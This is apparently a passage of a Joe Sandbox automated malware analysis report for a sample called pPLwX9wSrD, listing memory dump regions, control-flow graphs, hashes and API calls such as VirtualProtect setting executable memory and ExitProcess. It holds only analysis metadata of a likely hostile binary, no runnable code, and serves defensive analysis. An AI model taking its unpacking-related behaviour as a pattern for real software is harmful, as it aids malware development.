                                                                                      • Associated: 00000000.00000002.2504400591.00000000004E3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504429793.00000000004E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504456896.00000000004E5000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504486286.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504522892.0000000000501000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504555760.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504613956.0000000000531000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000538000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.000000000055E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000568000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000572000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.00000000005B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504889298.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000607000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000611000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505100044.0000000000619000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505187406.0000000000657000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505221184.000000000066F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505247599.0000000000671000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_pPLwX9wSrD.jbxd
                                                                                      Similarity
                                                                                      • API ID: ExitProcess
                                                                                      • String ID:
                                                                                      • API String ID: 621844428-0
                                                                                      • Opcode ID: fa661a32d2adea187457af83a65184e5a95d5169dd61d9ffd1f77c6ae7882cd8
                                                                                      • Instruction ID: 7f043b55bba1cea087d5b7230a66328f3964f628c50e939e6de4b99eb263b9e1
                                                                                      • Opcode Fuzzy Hash: fa661a32d2adea187457af83a65184e5a95d5169dd61d9ffd1f77c6ae7882cd8
                                                                                      • Instruction Fuzzy Hash: 0F1108B2805118EBFB518A00DC44BFF7779E781311F2480BAD80E92241D63C1FCACA57

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 214 457720-457735 216 457777 214->216 217 457737-457775 214->217 218 457788-4577b9 VirtualProtect 216->218 217->218 220 4577f2-45786a call 457877 218->220 221 4577bb-4577d7 call 4577d8 218->221 226 45786f-457875 220->226
                                                                                      APIs
                                                                                      • VirtualProtect.KERNELBASE(?,?,00000040,?), ref: 004577B1
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2504253839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2504233323.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504357526.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504400591.00000000004E3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504429793.00000000004E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504456896.00000000004E5000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504486286.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504522892.0000000000501000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504555760.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504613956.0000000000531000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000538000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.000000000055E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000568000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000572000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.00000000005B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504889298.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000607000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000611000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505100044.0000000000619000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505187406.0000000000657000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505221184.000000000066F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505247599.0000000000671000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_pPLwX9wSrD.jbxd
                                                                                      Similarity
                                                                                      • API ID: ProtectVirtual
                                                                                      • String ID:
                                                                                      • API String ID: 544645111-0
                                                                                      • Opcode ID: 0595ef4d57702ecd62f95ffef172c5e098d4f88bf6e59297f696487d7ad7074a
                                                                                      • Instruction ID: 3ac653862aa414495e91835405531963c09f1ef2290dea3d687fc9dc9d140946
                                                                                      • Opcode Fuzzy Hash: 0595ef4d57702ecd62f95ffef172c5e098d4f88bf6e59297f696487d7ad7074a
                                                                                      • Instruction Fuzzy Hash: D90188B2D085759AF7208A25EC48FD77B78DB05311F0041FAD94EA2641C6386FC58E96

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 239 45901e-45904f 242 459094-4590a6 239->242 243 459051-45908f 239->243 245 4590b9-4590ba 242->245 246 4590a8-4590b4 242->246 247 45956e-45957c ExitProcess 243->247 245->247 246->247
                                                                                      APIs
                                                                                      • ExitProcess.KERNEL32(00000000,?,?,?,?,?,?,00458FE5,00000000,?,0043A418,?,?,00458E08,?,00000000), ref: 0045957C
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2504253839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2504233323.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504357526.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504400591.00000000004E3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504429793.00000000004E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504456896.00000000004E5000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504486286.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504522892.0000000000501000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504555760.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504613956.0000000000531000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000538000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.000000000055E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000568000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000572000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.00000000005B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504889298.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000607000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000611000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505100044.0000000000619000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505187406.0000000000657000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505221184.000000000066F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505247599.0000000000671000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_pPLwX9wSrD.jbxd
                                                                                      Similarity
                                                                                      • API ID: ExitProcess
                                                                                      • String ID:
                                                                                      • API String ID: 621844428-0
                                                                                      • Opcode ID: f5a8a45653636614772b7f3c8f4cbbcf7838a92b6b5b636e0de09e5389a56a1e
                                                                                      • Instruction ID: b5d0014915d12a3598e1725df296fffb06eb1100f637566e0164185d3a357598
                                                                                      • Opcode Fuzzy Hash: f5a8a45653636614772b7f3c8f4cbbcf7838a92b6b5b636e0de09e5389a56a1e
                                                                                      • Instruction Fuzzy Hash: 48016DB1C14228DFEBA48A40DC81BEAB779EB04716F1840AADD0E27341D6781ED9CE46

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 249 45943f-459468 250 459479-459480 call 45948f 249->250 251 45946a-459474 249->251 254 459485-45948c 250->254 252 459514-45951b 251->252 255 45955d 252->255 256 45951d-45955b 252->256 254->252 258 45956e-45957c ExitProcess 255->258 256->258
                                                                                      APIs
                                                                                      • ExitProcess.KERNEL32(00000000,?,?,?,?,?,?,00458FE5,00000000,?,0043A418,?,?,00458E08,?,00000000), ref: 0045957C
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2504253839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2504233323.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504357526.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504400591.00000000004E3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504429793.00000000004E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504456896.00000000004E5000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504486286.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504522892.0000000000501000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504555760.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504613956.0000000000531000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000538000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.000000000055E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000568000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000572000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.00000000005B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504889298.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000607000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000611000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505100044.0000000000619000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505187406.0000000000657000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505221184.000000000066F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505247599.0000000000671000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_pPLwX9wSrD.jbxd
                                                                                      Similarity
                                                                                      • API ID: ExitProcess
                                                                                      • String ID:
                                                                                      • API String ID: 621844428-0
                                                                                      • Opcode ID: d89ff1d8691150932ae647357406571a5068245ea20f21c024c58090c2b432cd
                                                                                      • Instruction ID: 0b55d41236cd130563f3610df2a9b334fa95c7618c439a0bdf357ffe1e93e46e
                                                                                      • Opcode Fuzzy Hash: d89ff1d8691150932ae647357406571a5068245ea20f21c024c58090c2b432cd
                                                                                      • Instruction Fuzzy Hash: 5E01B5B2D0812CDBDB62CA54C8457EF7B79AB41315F2040B7D80E66202D6784FDACB46

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 227 458fff-45904f call 45901e 232 459094-4590a6 227->232 233 459051-45908f 227->233 235 4590b9-4590ba 232->235 236 4590a8-4590b4 232->236 237 45956e-45957c ExitProcess 233->237 235->237 236->237
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2504253839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2504233323.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504357526.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504400591.00000000004E3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504429793.00000000004E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504456896.00000000004E5000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504486286.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504522892.0000000000501000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504555760.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504613956.0000000000531000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000538000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.000000000055E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000568000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000572000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.00000000005B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504889298.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000607000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000611000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505100044.0000000000619000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505187406.0000000000657000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505221184.000000000066F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505247599.0000000000671000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_pPLwX9wSrD.jbxd
                                                                                      Similarity
                                                                                      • API ID: ExitProcess
                                                                                      • String ID:
                                                                                      • API String ID: 621844428-0
                                                                                      • Opcode ID: 1732509599216c171cc6fe1a71b4bbb6a727924a3e5b5b1131616c89ce18e8ea
                                                                                      • Instruction ID: ba06208c08cc8fda232d22fb4808a6d8f9f8b749774ba61f6a4910cca7da1023
                                                                                      • Opcode Fuzzy Hash: 1732509599216c171cc6fe1a71b4bbb6a727924a3e5b5b1131616c89ce18e8ea
                                                                                      • Instruction Fuzzy Hash: D20184B1C08328DFE7649A50DC857EA7778EB04756F2844AAD94E16282D6BC0EC9CE47

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 262 458a48-458a90 call 458a5d 266 458ad3-458bca call 458aef call 458b21 262->266 267 458a92-45957c ExitProcess 262->267 279 458bcc-458c05 call 458be0 266->279 280 458c0a-458c55 266->280 293 458f96-459004 call 458fa9 call 458ff0 279->293 281 458c95-458c9b 280->281 282 458c57-458c90 call 458c70 280->282 285 458ca1-458d28 281->285 282->293 295 458d2c-458e1c call 458e12 285->295 310 458e33-458e3d 295->310 311 458e1e-458e2e 295->311 310->295 313 458e43-458e50 310->313 312 458eb6-458ebd 311->312 315 458eff-458f4b 312->315 316 458ebf-458efa 312->316 313->295 314 458e56-458eb0 call 458e7e 313->314 314->312 322 458f5d-458f8f 315->322 323 458f4d-458f57 315->323 316->293 322->293 323->285 323->322
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2504253839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2504233323.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504357526.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504400591.00000000004E3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504429793.00000000004E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504456896.00000000004E5000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504486286.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504522892.0000000000501000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504555760.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504613956.0000000000531000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000538000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.000000000055E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000568000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000572000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.00000000005B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504889298.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000607000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000611000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505100044.0000000000619000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505187406.0000000000657000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505221184.000000000066F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505247599.0000000000671000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_pPLwX9wSrD.jbxd
                                                                                      Similarity
                                                                                      • API ID: ExitProcess
                                                                                      • String ID:
                                                                                      • API String ID: 621844428-0
                                                                                      • Opcode ID: 8de71da6df6f22dd9da78c7a4442245b50449f71b2d159f24b77817675a8c8f3
                                                                                      • Instruction ID: 16d05e053523882be76d858a8a626c9e9137edbfcd86b2d8977c33ca4bfd4a7e
                                                                                      • Opcode Fuzzy Hash: 8de71da6df6f22dd9da78c7a4442245b50449f71b2d159f24b77817675a8c8f3
                                                                                      • Instruction Fuzzy Hash: B0F0A4B2D042589BEB208AA1DC847DBB7A8FB40705F1044BB990DA2141DB785FCA8A1A

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 332 4591a9-45957c call 4591c0 ExitProcess
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2504253839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2504233323.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504357526.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504400591.00000000004E3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504429793.00000000004E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504456896.00000000004E5000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504486286.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504522892.0000000000501000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504555760.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504613956.0000000000531000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000538000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.000000000055E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000568000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000572000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.00000000005B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504889298.00000000005B1000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005B5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.00000000005F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000607000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504940666.0000000000611000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505100044.0000000000619000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505187406.0000000000657000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505221184.000000000066F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2505247599.0000000000671000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_0_2_400000_pPLwX9wSrD.jbxd
                                                                                      Similarity
                                                                                      • API ID: ExitProcess
                                                                                      • String ID:
                                                                                      • API String ID: 621844428-0
                                                                                      • Opcode ID: 2f287447fa55f607cf363093d891cb14762b6cd82fbbb1b9b97fde772bd9a25f
                                                                                      • Instruction ID: 59fd900fa6e3ae4c8f8d4082749dcf24ffa0ab2d078bb520ec18f9f006f86c96
                                                                                      • Opcode Fuzzy Hash: 2f287447fa55f607cf363093d891cb14762b6cd82fbbb1b9b97fde772bd9a25f
                                                                                      • Instruction Fuzzy Hash: 77E04F708083289BDBB19B00CC857DE7775AF04314F2040D9D48E52311DB34AED8CE03

                                                                                      Control-flow Graph

                                                                                      • Executed
                                                                                      • Not Executed
                                                                                      control_flow_graph 337 458486-45957c ExitProcess
                                                                                      APIs
                                                                                      • ExitProcess.KERNEL32(00000000,?,?,?,?,?,?,00458FE5,00000000,?,0043A418,?,?,00458E08,?,00000000), ref: 0045957C
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000000.00000002.2504253839.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                      • Associated: 00000000.00000002.2504233323.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504357526.00000000004C1000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504400591.00000000004E3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504429793.00000000004E4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504456896.00000000004E5000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504486286.00000000004EF000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504522892.0000000000501000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504555760.0000000000508000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504613956.0000000000531000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000538000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000552000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.000000000055E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                      • Associated: 00000000.00000002.2504642840.0000000000568000.00000002.00000001.01000000.00000003.sdmpDownload File
